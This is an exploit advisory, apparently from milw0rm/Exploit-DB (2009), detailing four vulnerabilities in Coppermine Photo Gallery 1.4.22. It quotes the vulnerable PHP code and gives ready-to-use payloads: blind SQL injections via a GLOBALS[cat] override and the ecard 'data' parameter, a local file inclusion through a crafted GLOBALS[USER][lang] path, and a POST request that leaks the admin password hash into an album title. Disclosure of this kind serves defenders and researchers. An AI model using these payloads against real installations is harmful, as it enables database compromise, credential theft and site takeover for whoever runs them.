coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities

EDB-ID:

8713

Author:

girex

Type:

webapps

Platform:

PHP

Published:

2009-05-18

Author:	girex
Site:	http://girex.altervista.org/

CMS:	Coppermine Photo Gallery <= 1.4.22


Coppermine Foto Gallery suffers from different vulnerabilities.

There is a Local File Inclusion and a Blind SQL Injection working with 
register_globals = On and magic_quotes_gpc = Off
and
a SQL Injection working in case of registration is enabled and a user can create/modify albums 
(default setting if registration is enabled) and php.ini regardless
and 
a Blind SQL Injection when is enabled the ecard logging system 
(that is not a default configuration) and php.ini regardless

Let's see how do they work...

-------------------------------------------------------------------------------------------

Is possible to bypass the anti-register_global protection and obtain a blind sql injection or a local file inclusion.

I couldn't find a better way to exploit bypassing the anti-register_global protection so i just write this
Proof of Concepts.

Let's see the anti-register_globals protection and how to bypass it...

File: /includes/init.inc.php - lines: 42-65

	$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST', 'keysToSkip', 'register_globals_flag', 'cpgdebugger');
	
	if (ini_get('register_globals') == '1' || strtolower(ini_get('register_globals')) == 'on') {
	    $register_globals_flag = true;
	} else {
	    $register_globals_flag = false;
	}
	
	if (get_magic_quotes_gpc()) {
	        if (is_array($_POST)) {
	                foreach ($_POST as $key => $value) {
	                        if (!is_array($value))
	                                $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
	                        if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
	                }
	        }
	
	        if (is_array($_GET)) {
	                foreach ($_GET as $key => $value) {
	                        unset($_GET[$key]);
	                        $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
	                        if (!in_array($key, $keysToSkip) && isset($$key) && $register_globals_flag) unset($$key);
	                }
	        }

Same happens for $_COOKIE and $_SERVER vars and also with magic_quotes_gpc = off
This protection is easily bypassable defining GLOBALS vars via GET or via POST.

Example: index.php?GLOBALS[dummy_example]=damn
It defines the global var dummy_example.

Let's see how to exploit it...

File: ./thumbnails.php - lines: 79-

	if (isset($_GET['sort'])) $USER['sort'] = $_GET['sort'];
	if (isset($_GET['cat'])) $cat = (int)$_GET['cat'];		<== bypass the int cast 
	if (isset($_GET['album'])) $album = $_GET['album'];

	...
	if (is_numeric($album)) {
	...
    	
	} else {
        $album_set_array = array();
        if ($cat == USER_GAL_CAT)
            	$where = 'category > ' . FIRST_USER_CAT;
       	else
            	$where = "category = '$cat'";

        $result = cpg_db_query("SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} WHERE $where");  <==  Vulnerable query


Here's a proof of concept:
NOTE: - we need register_globals = on and magic_quotes_gpc = off

[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=1%23	true
[target]/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=2%23	false

-------------------------------------------------------------------------------------------

It's also possible to obtain a local file inclusion overwriting $USER array and in particular
$USER['lang'] vars...

File: /include/functions.inc.php - lines: 128-135

	function user_get_profile()
	{
        	global $CONFIG, $USER;

        	if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {
                	$USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));
                	$USER['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');		<== we bypass it
        	}
      
		if (!isset($USER['ID']) || strlen($USER['ID']) != 32) {
                	list($usec, $sec) = explode(' ', microtime());
                	$seed = (float) $sec + ((float) $usec * 100000);
                	srand($seed);
                	$USER=array('ID' => md5(uniqid(rand(),1)));
        	} else {
                	$USER['ID'] = addslashes($USER['ID']);
        	}

        	if (!isset($USER['am'])) $USER['am'] = 1;
	}

File: /includes/init.inc.php - lines: 318-346

	if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
	{
        	$CONFIG['default_lang'] = $CONFIG['lang'];          // Save default language
        	$CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
	}
	elseif ($CONFIG['charset'] == 'utf-8')			<== default configuration
	{
       		include('include/select_lang.inc.php');
        	if (file_exists('lang/' . $USER['lang'] . '.php'))
        	{
                	$CONFIG['default_lang'] = $CONFIG['lang'];      // Save default language
                	$CONFIG['lang'] = $USER['lang'];
        	}
	}
	else
	{
        	unset($USER['lang']);
	}

	if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
	{
                unset($CONFIG['default_lang']);
	}

	if (!file_exists("lang/{$CONFIG['lang']}.php"))
  	$CONFIG['lang'] = 'english';

	// We load the chosen language file
	require "lang/{$CONFIG['lang']}.php";		<== vulnerable include


Here's a proof of concept:
NOTE: - we need register_globals = on and magic_quotes_gpc = off

GET /[path]/index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt%00 HTTP/1.1
Host: [host]
Connection: close

This will include README.txt, if register_globals=on magic_quotes_gpc=off
and if User-Agent and Accept-Language headers are not set. (see code)

-------------------------------------------------------------------------------------------

When registration are enabled and a user can create/modify albums with password is possible 
to obatain a blind sql injection php.ini regardless.

File: ./db_input.php 

	$event = isset($_POST['event']) ? $_POST['event'] : $_GET['event'];
	switch ($event) {
 
	...

	case 'album_update':
        if (!(USER_ADMIN_MODE || GALLERY_ADMIN_MODE)) cpg_die(ERROR, $lang_errors['perm_denied'], __FILE__, __LINE__); <== USER_ADMIN_MODE is TRUE if we are logged in

        $aid = (int)$_POST['aid'];
        $title = addslashes(trim($_POST['title']));
        $category = (int)$_POST['category'];
        $description = addslashes(trim($_POST['description']));
                $keyword = addslashes(trim($_POST['keyword']));
        $thumb = (int)$_POST['thumb'];
        $visibility = (int)$_POST['visibility'];
        $uploads = $_POST['uploads'] == 'YES' ? 'YES' : 'NO';
        $comments = $_POST['comments'] == 'YES' ? 'YES' : 'NO';
        $votes = $_POST['votes'] == 'YES' ? 'YES' : 'NO';
        $password = $_POST['alb_password'];					<== this var is not addslashed
                $password_hint = addslashes(trim($_POST['alb_password_hint']));
        $visibility = !empty($password) ? FIRST_USER_CAT + USER_ID : $visibility;

        if (!$title) cpg_die(ERROR, $lang_db_input_php['alb_need_title'], __FILE__, __LINE__);

        if (GALLERY_ADMIN_MODE) {
            $query = "UPDATE {$CONFIG['TABLE_ALBUMS']} SET title='$title', description='$description', category='$category', thumb='$thumb', uploads='$uploads', comments='$comments', votes='$votes', visibility='$visibility', alb_password='$password', alb_password_hint='$password_hint', keyword='$keyword' WHERE aid='$aid' LIMIT 1";
        } else {
            $category = FIRST_USER_CAT + USER_ID;
            $query = "UPDATE {$CONFIG['TABLE_ALBUMS']} SET title='$title', description='$description', thumb='$thumb',  comments='$comments', votes='$votes', visibility='$visibility', alb_password='$password',		<== vulnerable query alb_password_hint='$password_hint',keyword='$keyword' WHERE aid='$aid' AND category='$category' LIMIT 1";
        }

        $update = cpg_db_query($query);

$_POST['alb_password'] is not addslashed before being used in a query.
You must know that all _GET _POST _REQUEST variables are sanizated in init.inc.php...

File: /include/init.inc.php

	// Do some cleanup in GET, POST and cookie data and un-register global vars
	$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => '&#39;', "'" => '&#39;'); 

	...
	$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
	...
	$_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
	...
	$_REQUEST[$key] = strtr(stripslashes($value), $HTML_SUBST);


So quotes are fixed, but what about backslash (\). We can manipulate the query inserting a backslash at the end of
$_POST['alb_password'] and execute SQL in $_POST['alb_password_hint'] parameter.


Here's a Proof of Concept: 
NOTE: - registration must be enabled and an user must can create/modify albums 
      - works regardless of php.ini settings

- Log in with your user credential
- Create an album with password
- Do this request:

POST /[path]/db_input.php HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Cookie: [your_cookies]
Content-Type: application/x-www-form-urlencoded

event=album_update&title=x&aid=[YOUR_ALBUM_ID]&alb_password=%5C&alb_password_hint=,title=(SELECT user_password FROM cpg14x_users WHERE user_id=1) WHERE aid=[YOUR_ALBUM_ID]%23

You will set the admin's password (user with user_id=1) as the title of your album.

-------------------------------------------------------------------------------------------

And we have also a Blind SQL Injection with a specific configuration of coppermine...

File: ./displayecard.php - lines 26-38

	if (!isset($_GET['data'])) cpg_die(CRITICAL_ERROR, $lang_errors['param_missing'], __FILE__, __LINE__);

	$data = array();
	$data = @unserialize(@base64_decode($_GET['data']));

	// attempt to obtain full link from db if ecard logging enabled and min 12 chars of data is provided and only 1 match
	if ((!is_array($data)) && $CONFIG['log_ecards'] && (strlen($_GET['data']) > 12)) {
        	$result = cpg_db_query("SELECT link FROM {$CONFIG['TABLE_ECARDS']} WHERE link LIKE '{$_GET['data']}%'");
        	if (mysql_num_rows($result) === 1) {
                	$row = mysql_fetch_assoc($result);
                	$data = @unserialize(@base64_decode($row['link']));
        	}
	}


Here's a Proof of Concept: 
NOTE: - $CONFIG['log_ecards'] must be set to 1 (and this is NOT a default config) 
      - works regardless of php.ini settings

Make an injection with this php code:
<?php
$injection = "%' OR BENCHMARK(999999, md5(0))#";
$injection = urlencode(base64_encode(serialize($injection)));
?>

Then:
GET http://[host]/[path]/displayecard.php?data=[$injection] HTTP/1.1

girex

# milw0rm.com [2009-05-18]